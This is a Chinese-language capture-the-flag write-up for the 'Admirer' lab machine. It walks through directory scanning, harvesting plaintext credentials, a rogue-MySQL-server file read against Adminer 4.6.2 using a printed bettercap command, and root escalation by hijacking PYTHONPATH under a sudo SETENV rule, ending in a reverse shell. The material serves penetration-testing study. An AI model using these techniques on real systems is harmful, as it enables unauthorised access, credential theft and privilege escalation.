基本信息

端口扫描

21,22,80几个端口:

80

根据扫描结果,robots.txt中得到admin-dir目录,直接访问是403:

扫描目录,这里字典很重要,因为包含敏感信息的credentials.txt,一般字典里没有:

credentials.txt

1
2
3
4
5
6
7
8
9
10
11
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

FTP

使用得到的ftp账号密码登录,发现两个文件:

index.php

下载源码解压,index.php中得到数据库信息,但是数据库没有对外开放端口:

1
2
3
4
$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";

utility-scripts/admin-task.php

根据输入的task id执行脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
// Web Interface to the admin_tasks script
//
if(isset($_REQUEST['task']))
{
$task = $_REQUEST['task'];
if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
$task == '5' || $task == '6' || $task == '7')
{
/***********************************************************************************
Available options:
1) View system uptime
2) View logged in users
3) View crontab (current user only)
4) Backup passwd file (not working)
5) Backup shadow file (not working)
6) Backup web data (not working)
7) Backup database (not working)

NOTE: Options 4-7 are currently NOT working because they need root privileges.
I'm leaving them in the valid tasks in case I figure out a way
to securely run code as root from a PHP page.
************************************************************************************/
echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
}

utility-scripts/db-admin.php

也是数据库信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

里面包含一句提示信息,直接尝试访问 http://10.10.10.187/utility-scripts/db_admin.php 是404,说明作者找到了更好的开源方案,这里需要根据靶机名Admirer想到adminer(以前叫做phpMyAdmin)

adminer.php

但使用前面得到的那些账号密码无法登录,继续查找信息,注意版本,Adminer 4.6.2, 找到相关漏洞:

mysql client 文件读取

其实就是load data lcoal infidel,我们自己做一个server,让客户端连接,读取客户端的任意文件,直接用bettercap就可以做,因为前面知道index.php中存在密码,就直接读取index.php:

1
sudo bettercap -iface utun2 -eval "set mysql.server.infile ../index.php; mysql.server on"
1
2
3
4
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

user flag

这个账号密码可以ssh登录,得到user.txt:

提权信息

sudo -l发现:

(ALL) SETENV: /opt/scripts/admin_tasks.sh

admin_task.sh中

1
2
3
4
5
6
7
8
9
10
backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}

这个函数调用了同目录下的backup.py文件,这个文件使用shutil中的make_archive函数,注意前面我们有SETENV权限,可以考虑做一个恶意函数,并且修改环境变量,这里Python使用的是PYTHONPATH:

提权

设置环境变量,运行,触发恶意函数:

root flag

反弹shell,得到root.txt:

参考资料